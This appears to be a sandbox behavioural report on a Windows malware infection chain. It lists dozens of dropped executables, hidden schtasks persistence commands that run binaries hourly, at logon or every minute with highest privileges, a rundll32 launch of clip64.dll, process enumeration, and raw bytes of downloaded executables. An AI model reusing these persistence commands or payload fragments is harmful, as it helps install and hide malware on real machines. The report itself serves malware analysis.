file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe
file	C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe
file	C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe
file	C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe
file	C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe
file	C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe
file	C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe
file	C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe
file	C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe

Drops an executable to the user AppData folder (31 events)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\clip64[1].dll
file	C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\KUrJTQEsIHMvAcabBVxa.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe
file	C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe
file	C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe
file	C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe
file	C:\Users\test22\AppData\Local\Temp\toolspub1.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\nshDAD7.tmp
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\txBA3rlC1VaXg6uHQQD1.exe
file	C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file	C:\Users\test22\AppData\Local\Temp\rost.exe
file	C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\Q2lP3WOPFRddpU6U21z0.exe
file	C:\Users\test22\AppData\Local\Temp\nsaD6BF.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe
file	C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
file	C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4M1jhwiskHEa_E\K5hUVnj3aMwtC3i_NpaY.exe

A process created a hidden window (17 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2436 thread_handle: 0x0000013c process_identifier: 2432 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000140	1	1
CreateProcessInternalW Jan. 26, 2024, 9:01 a.m.	thread_identifier: 2544 thread_handle: 0x00000148 process_identifier: 2540 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000144	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000609001\stan.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000629001\installs.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000630001\fsdfsfsfs.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000631001\MRK.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000632001\sadsadsadsa.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000634001\Atqumy.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:01 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000636001\latestrocki.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000639001\moto.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000640001\crypted.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000641001\2024.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000642001\alex.exe	1	1
ShellExecuteExW Jan. 26, 2024, 9:02 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000643001\rdx1122.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (8 events)

Time & API	Arguments	Status	Return
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: SearchProtocolHost.exe process_identifier: 1608	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: SearchFilterHost.exe process_identifier: 1676	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: rost.exe process_identifier: 1932	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: svchost.exe process_identifier: 2236	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: mscorsvw.exe process_identifier: 2264	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: mscorsvw.exe process_identifier: 2308	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: cmd.exe process_identifier: 2480	1	1
Process32NextW Jan. 26, 2024, 9:01 a.m.	snapshot_handle: 0x00000484 process_name: pw.exe process_identifier: 2516	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 26, 2024, 9:01 a.m.	process_identifier: 2840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x052c0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the processes rost.exe, explorhe.exe, installsetup7.exe (19 events)

Time & API	Arguments	Status	Return
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL7f³eà"¬ PwÀ @`3@@@d\|@ Là uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcL@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%3%3%hM=%hM%hM %æH!%æH'%æHF%hM"%3%ã%¨K2%¨Ko2%¨K2%Rich3%PELlÖeà °´]@ @@@8Ð6`ðØ(Ð6`´8Ð6<@à j@@àP@ ª@à´@àP ´@à.rsrcð´@àÐ/¶@à.dataTh° Ð6¤ ¶@à#ªº9wÐäBôoÈ^ûË_¦úÌ$äYÃ©ÓÃým6®ïÉ¦Ä,ÇC££7Ö=#,E+Æt]Âb¸ c©«ÆO9øV3P7ÚZ62ÒM./1ýÑ3ÞRqøÔ¹VFIJ»$iaÚý`¯%^ É¸¿OÔ/o¿`>Jê¿1°Ã¶<÷ÌêÆó;Ê¨¡)ÀÃ]ïÇ®XN'rZr2óàfÓÎwm ÛTî%ïöÐ>î Ëô9tú\|OñÀ$kãÓáR£Yc\|²õÒ!òc/Úøãw#ò>]ç\|Øk×ç]yÜÃeøKëÇ÷d9(¶mÝé½BîÀßÍlNeLÌF¼6ç%fLðÛgEw-t¬!"kÇRQ%ÞÁZîbÛ$]PM©Fñß4f²ý¦reÔnÕ(:í 7ëÚ¾ÞÊOÊ)}LT &s@^¢§fg Tê{ÊåM6"¯xçúÊÓsß7ªæ«4bx«# X²æóýæ+ ,7þM¤W,ÞØÏ¹cz"@yKC\|ý¯QÀ &¸S\=½Ã¯7»õ·+Ùa< É0% 0ÕÚ#ûPZ·!©¨¼¡^ @¸!B7C/HY+îe÷¾f°Énó=d%sîÆWu vÝÚ¶cú]ç¶»óX}§X$f¥¥q¬äÕl ª%Þh<ËLlÿ¡ºÆ3»ýµrìyçÀ²Z¤_LÕeF_)$FIËyKÒdY¥$hæ?$äÖItOp{"Ð&!Ûèò¯`ýÇ!:6BFs$'.²øÜ ø ß0¥1yà ³ÃÄ©fcö=ìN,S3bÓ.vÕbÓ¿>Úßo\|e÷ÐÈ 0¸JªÐ¥xËT7½2Ù~§ _ oáÁIM 1G§åî^³ò æµmÏäZÃï T>,I'Èj°ó4mç©JU=ù¾nÅÎY&£;ûA! IóòEYr{îõÅ¨ª·Õ*ôòËñA]A>R)Ó?\øÔÃ´,ÔÓ´íÙ±¸Ïa$å-À£N-éËrx+v²J,¹ÁæOÚ³vòz'CzÎÞ¢ô0;dçÈëv"Ü xò%çìH-ÛÂÄKÈbÈ6>tÒæy7Ta/ÅÇCT´3V£²¶G\LýÒÛY=Ô¬@ >ÄÝáÑÚtöI(hö'X@ëR(ß©é request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà.0æ¾ @ ``pK @$ H.textÄä æ `.rsrc è@@.reloc@î@B H(´XÜÝ`$0]+(êfAV~:K( è s ( þþ ( ( ?rps z6+(ãc(N+('Ö}k(( j+(¥¯G3(( }0@s @ (&0d ?( ~ ( :F Q4ý¡f a~{a(3( %(& Ð( (&(&0( ~ 8c o GöE¥ Ô;^ìa~{a(3( 90 o (:(&( o (&Xi?ÿÿÿ(&0( ~ 8d o EV' c ûÅa~{ja(3( 9+ o (:(& o (&Xi?ÿÿÿ(&0 e ?( ~ ( :G.( þ%(&%~ ( & Ð( (&(&0_~ o :~ o! o" 8o# ; o" Ý 9o$ ÜÝ&Ý 9F XX0¹(((( if§Å Ï!¥a~{¢a(3( qÓ@ µ6,a~{¨a(3 ×ï÷e Î]Æ+a~{Qa(3 Fç S%pa~{¤a(3( ú×á% Zûa å÷a~{La(3 *õæ DåËa~{Sa(3 í.êÀ c ·ý£a~{ea(3( R¡nÜ óÂa~{a(3 §0F ¥X ¿Áa~{Za(3 ï#e /ÂÅa~{wa(3( Õl1 Rè1a~{a(3 ?YËQ ÄÔSa~{ja(3 äh^ » £a !¹a~{a(3( ?YËQ ß7a~{a(3 Óª#D H·ýa~{ka(3 a°8 \|qa~{a(3( ßf ÄÈ2a~{La(3 ¦¨è# µ6qa~{ka(3 Ñ`Ü 0Ù Y -UR1a request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL·¹°eà"jXN°@0N@PD@ø=PDh[8 @àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/@à.dataà PDØ @à´î°ÍÄ8«¹;c¡´´Ü¯ñä£«XWI9h@Ý¾ÊM©a¿5Á Ia·¢ì¿ÐÇ7Å=ª<«½ôÀFÑrÐêíB4<TlAÐU [G7yìpq¼eÿúmXÏ¾_Rk¦ÜÙ4â º5bç÷öãLP8øÙm«°ÂíìkÒDl\åË?FÒ§%¬Ò}9Nù:T@,^?²)c Å°Ìtáq°Q«yýTÆ[ªÐcS[v 0¾r\|OCyÅðÍb mÍc#ÂP'®as³QhP/þTkJ?[.ät!_âÒ?ßì73LE ßÉiÔ¼»tLÌ;¯HáãçMxv±·§y1óÆÉä1E\|Ù/þUï TÐçÖKWFµõÄ#P;\|C\\|$Ò]mKHQv4µÄË' Ñp;²T¡µQ&ò7mP-jUJ7YT¼~TOönþçÞÒÖ¤JÓÙ8iGCÐ§Õ^@Ù5g^²áAGJû¦}PÀIwùúgZ9à§}ÂÍd#À½½ñCg´¿ÉÏø§Ð éziïÅúÐ`dÛæ{-Ô+Ji£ëêÓa&ôoK×ãØB~3o<YB£éÕ>êÂlgG¹70ô£àå7o¹íràó¶G<\«§{S·ÊV²ú^+?VÀûzÖ%u&ÑõúÝIÝ·jXc\|½ü5å±)p&af7ÌêËIìBokÂ'ªV¼ø¡k{(ýLHçQ©&õP51ø}6I "ÀÈ¯xm\| #axpaà<ÅÑp¼ÖV~ÉÖ[äÚg3ÿÛæÇëY®/mÜ]â¤×mi?;ÏüZ½ùÊá@&/À^(`Zü:ÎÚf®ÉhK3òzÆ°Qd´Ó?¸t6-ÈãrM£TEõG^ãÎç©Qå4×°%ªD9Ð"¨L>HÌ¸)<hAóó`ûö«òÓÿèAV.Ò4´¥f¸*9 C`ÁH2, eR¦¿w-á'&«¸Q&Lj ñÃ³2¥>ª¥Õ¥þm²M³ëª«Úÿ#?]ÑK&péýhQë^WX¢®3/¡;°.ïýLëP§G«tªÌÒróþ:I°+LBHLOdJÄúåKP`hGnE¯â;À3þäzÔBÌ¹LF×o TÃ request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL7f³eà"¬ JwÀ @PhD@@@d\|@ àÐ uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcà@ ô@@.relocuÐ v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 26, 2024, 9:01 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL·¹°eà"j¨N°@0N@PD@ø=PDh[8 @àp°.@à@ L@àP`T@à°V@à.rsrc@@>V@àÐ/@à.dataà PDÖ @à?ÄHktÔÇ¾@ªjXT¹¸tx>¡ÝAü.Îþ¾ùùËô8õr`¨s¸ªë\cëxb jmÁ\VWvä·ýïýtq&÷{O ê#Oßx÷µLÇwÓ¨ëç-DG-cñþd6øø( S}T¼¡sa2èg/x©¸ÐÄ"®Ýö»<®5µÙ'1àSÝr+S1ôøùg«"ò\| Ç,ä<÷sÚ&À½ËyÐ¯×Imæ5iÁÄþ{«êòØQóu«Ëâ²û/r¶à'ÁXûiK%ºD >¤x¥aoµ¸En îgéáNç ÷ÿëE$ÁÑBÐ¢ÃÔ1Ábö°cøñ jB@^}¶®QÚÜ¤÷_r(ß@?s@Ëfú§î7JÖ?6Þ7¶þûW¿pÇwÐÇ¢ï ábo!ö¶\|EË5(\|ÇÔjÙÿR÷ÓhsÁ2¾bDYÄÚP ócìZÍø@ÔçÀ4SN,ed}MË÷óg¿¹¬^Þô ÜÖYÒØ±!AíÐ(¶1(Sæ.\í%U¹þÝÖÌGÜ=ÙòíÐ²1 Q²&±KÅºÔ£àX÷D×qàczëÂdD9 ìéþAGFÁß Hýòlú@VþL®¡æÖÌ`$¥¯úñy:ÜóøAWÊ:'ÝÈ¢ò·Phù²à¢þ«®1Êðù¤WSkmÅ¸¶Ê6&éC¬ómçÚî".Vv-ÝfNNá§fiE,Öê§îH¥+néuhLÚÝÃ¹oØ}nþýOÈ·),¢/ÿQôvÞ¨ÄÌYÍkp¦{Ä¢Æ(ÓÆî£©¾I?70;\xOµAÁ$yn.xÒYá0¼±.'ÇÇpèÁý½ú_¿£ ùxÇ[Î"öÎø(¡ç8îN]bùÆÅê7~ÝÎd´GÝ´òsë)6ôJØ6äyu]ôL)ÂðNâòvðn º¶ 1¿³$Àyïû+®sçD~±o×ôeª8içVÐÎ6#âí¤zêÌmÖ¹q)ò ÆO±ér:aÚ¬X-F¡;.vðN$w¥£·ZåÌÖnK fZ©c{Ø³øç½âíÓ¤UüðÙáò_eÈ"Báâ¸>¶Úæ'MdZå@¶Ñ°FPBð`èüä«Ù`d\|Tp¼¤³2o8G;6Ä°ÐL§VÔjÇéP]]DKµ÷`\ ¥Þ¨y&aÄdÃBRÙ[úQÛ]fÇ.¨c$öéB¥!VoHÞÿùR´±$Ãâ¨F<(è&#&¥óßßåmgI»7Wsy}°¨> [ÊUî{óÇJåØ_Stv©=íá6÷¢ ´ÇGêÂpÂr<þ ð¨r&ÃXÒ³Ñ=:]+rÅ¼ï9üâgû[ ïÇ®SG,;Û](<¦Ë÷%ØË{CÌyCû9¬Z%Bß<Ð;¡åû §^mÑFá=]sÌJ@íÅQ6ÍÔÍ÷Å²Ðõðs(u?¦ÎpµSÓ.;óôæxåÆé,>ÄÃøúÁª¢7QEôhcp»°øGí'öÁE;J/îqIUJm¡ÿÀ¥úª«´h^ªµÑø.UCÎ/ vÌªiNêRé3ü·Oùïl²Ý¼ñC <`Òk¨éIÈuF5úw',æÔ³ Èçd)ÊP7sSñæäÊ£ÅmåÁ,·Ó³Ô×W5ì8ëch3Ð«_Ðë¼ B$ÎúIÿwÂú8+]¢³¾O#Ð«ÉHbc=÷ó¾ kÌã{~fmßð ÅÐÍóÓ µ;4m«Ü)ðÎ}¾´í¥v9Ì.Ç4UuÜ'@ââiÔñµ];'ÕÒÓÃ(ú·î«ÌÑ]h^¨?ÎvA.êÐð¸(E¢LìxoÜöiqYy7~ù¢j?ÇÐAì>ÇØSö.,Ìè ûc^Ì3ùò.µ{NaO°¸Äÿ-âiPÎ±ñË.Eîg°BT!g8sá!làzÕék?Gm§Aï D<GAGO+þ³;¯[k§Ñ±DòfïÕç¾5AÁÌ¯0qÈ32íå¼[+Ë¿Ò7u¦%U©ùæu OÅÑYfà6¼=glºnJÀÄs:þ\|¦ ±$×:HÖY·rVó!)#uÆzæîèù%Ámû=/¹yZ8øfN®¡!ã{èöGº,ÉÆ{w´pÃ¬L¸. já.«ãv ãv>XvxNìH.÷MCJ#êÇ-wyñ4GÓ à@Üþ0n`JtÝ> "áogrDÚ/hTý ±Ä§bÌ§ÏÕÝÃÕ¿"?h:¸¢º²#öÔÒF5ñvÀ'ÂÊªkjATÚËÀhÐ-$KÃ[ß=¯¦i3?eÔ³³èX`Ì½Â¬;A·bÈ]%ªò'uôü×2ÂÀ0Ð:ºïÍèÞõ¨Ô6ö i¶¹7Mfjou§ºÛ¼%´rÍ»åÃUùÌæP$þXè¥Ývg¦Zo.øeBá7Vpç×HÞ¹;¤fÚíùA0qÀ¶NK¬¿ç®3x{^ ë-/t>ó 8Ý"¾ ÆöÛWí3Æ*UöÒÌóCÜÁ²SÕÉ¶Õ«´iVyOÎàt[öò,R+Âý#H:eoM´ó< Ø&.I~ÛY eºû8ïh¤J÷ f`êÍZ`ôI gÈ®ºJLÃôpøTvûY@·.[@ÓÅ\|iÁú½ºÏ®YØ\|©¸¸ívOß E®Ï+4«èÔ¸Àd3ÎmVwûáâyÌ¶"(³´`7_ð:,^^ð°ê0[BÝ@â!?ûË2µÝzï¡Âïæïî Ô«a¸ø¢Xm(vn)¼@ÕÑÔå¡éÐ¿/¯Ó3nR!,¡ê1®F!®ôÐ¨7éT×óZYÞÉ!¥ìâoK¿w :pª2ntFv ¦·¡,»u´?Q³`½ìQ§Î:Nìn0 ç\| ¨¬ç°U@MÈïðBs\|ú[ÓÂÃ¼Ì¶v9n,v;spjÌfÂd+ÏeA5K¾äGð6õ0"µpdq¢ÎPå gøn8ÜP!+ív¶ó °Z§°¡I^A¹ýÐ\ÝI¤ÓùJvWÌQLèßâÀÑ\|^¢yIî8ç3BGKCnZîáËÈF1þÃä&!C¼ûâ&fbÏ:5¸6í ÕÖÆÏd«owKþSm¿Ñ²»_cÏ¦õ +4m¬FCZ/×ºÃ7¡Þ h¯_1e7$ý@&[Q?%ìvc$èP+órpOHb4]ØÎ)s#~DÉ¨26(Û#³°ùô0Öuv°Ä<üuwúL³!0ä!t::°üÉÕêlM±ð2«e¶ÈÅ2ûïM¢ðNG< ÛT¡Îßé3Q¤ól@ëtwBÉ·#éçÊ÷rhúÔÜøÓ&ZÀ<eWßÄWÎ\q¤¥ÕÂ7pÂoo®Í´e¾¯m:ùÀ\|¸Ùðkñ\|áÝ¶StCI1gj;vé®O,ðùh£%¢JMçå»GþD6QteD¢Ì©u request_handle: 0x00cc000c	1	1
